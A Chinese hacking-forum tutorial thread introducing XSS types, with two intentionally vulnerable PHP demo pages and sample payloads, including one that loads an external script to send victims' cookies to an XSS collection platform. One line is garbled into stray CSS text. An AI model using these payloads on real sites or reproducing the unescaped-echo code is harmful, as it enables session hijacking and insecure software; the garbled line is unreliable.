黑帽联盟

 找回密码
 会员注册
查看: 1629|回复: 3
打印 上一主题 下一主题

[系统安全] 初窥XSS跨站脚本攻击

[复制链接]
yun 黑帽联盟官方人员 

920

主题

37

听众

1364

积分

超级版主

Rank: 8Rank: 8

  • TA的每日心情
    奋斗
    2019-10-18 11:20
  • 签到天数: 678 天

    [LV.9]以坛为家II

    本帖最后由 yun 于 2017-4-30 22:27 编辑

    XSS跨站脚本攻击的分类
    一、 反射型XSS跨站脚本攻击
    二、 存储型XSS跨站脚本攻击
    三、 基于DOM的XSS跨站脚本攻击

    1.反射性XSS
    经过后端,不经过数据库
    2.储存型XSS
    经过后端,经过数据库
    3.基于DOM型的XSS
    不经过后端,DOM—based XSS漏洞是基于文档对象模型(即Document Objeet Model缩写为:DOM)的一种漏洞,dom - xss是通过url传入参数去控制触发的。DOM 定义了访问 HTML 和 XML 文档的标准:

    案例一:
    1. <html>
    2. <head>
    3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    4. <title>XSS原理重现</title>
    5. </head>
    6. <body>
    7. <form action="" method="get">
    8. <input type="text" size="50" name="xss_input">
    9. <input type="submit">
    10. </form>
    11. <hr>
    12. <?php
    13. $xss = $_GET['xss_input'];
    14. echo '你输入的字符为:
    15. '.$xss;
    16. ?>
    17. </body>
    18. </html>
    复制代码
    输入payload:
    <script>alert('xss')</script>
    55.png

    仅仅是弹窗?
    <script>alert(document.cooki)</script>  //可以打印COOKIE
    <script src=https://is.gd/86Zg1z></script>  //结合XSS平台打COOKIE
    56.png

    案例二:
    1. <html>
    2. <head>
    3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    4. <title>XSS利用输出的环境来构造代码</title>
    5. </head>
    6. <body>
    7. <center>
    8. <h6>把我们输入的字符串 输出到input里的value属性里</h6>
    9. <form action="" method="get">
    10. <h6>请输入你想显现的字符串</h6>
    11. <input type="text" name="xss_input_value" value="输入">

    12. <input type="submit">
    13. </form>
    14. <hr>
    15. <?php
    16. $xss = $_GET['xss_input_value'];
    17. if(isset($xss)){
    18. echo '<input type="text" value="'.$xss.'">';
    19. }else{
    20. echo '<input type="type" value="输出">';
    21. }
    22. ?>
    23. </center>
    24. </body>
    25. </html>
    复制代码
    在输入处输入aa以后看源码:
    57.png

    然后写出绕过payload
    "><script>alert('xss')</script>
    58.png

    后来看文章发现这个也可以:
    "margin: 10px auto; color: rgb(0, 0, 0); font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;">039是单引号的ASCII值.在其前面加&#即可.也是可以弹窗。注:需要触发。
    59.png

    需要触发肯定很麻烦,这个时候我们可以换一些别的事件。
    Onmousemove 当鼠标移动就触发
    Onload 当页面加载完成后触发

    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    2

    主题

    0

    听众

    114

    积分

    黑帽新手

    Rank: 2

  • TA的每日心情
    擦汗
    2019-8-19 11:08
  • 签到天数: 54 天

    [LV.5]常住居民I

    厉害了啊技术党
    回复

    使用道具 举报

    52

    主题

    2

    听众

    310

    积分

    黑帽学员

    Rank: 3Rank: 3

  • TA的每日心情
    奋斗
    2019-9-27 16:27
  • 签到天数: 258 天

    [LV.8]以坛为家I

    学习学习。
    回复

    使用道具 举报

    头像被屏蔽

    2

    主题

    0

    听众

    6

    积分

    黑帽菜鸟

    Rank: 1

    该用户从未签到

    提示: 作者被禁止或删除 内容自动屏蔽
    签名被屏蔽
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部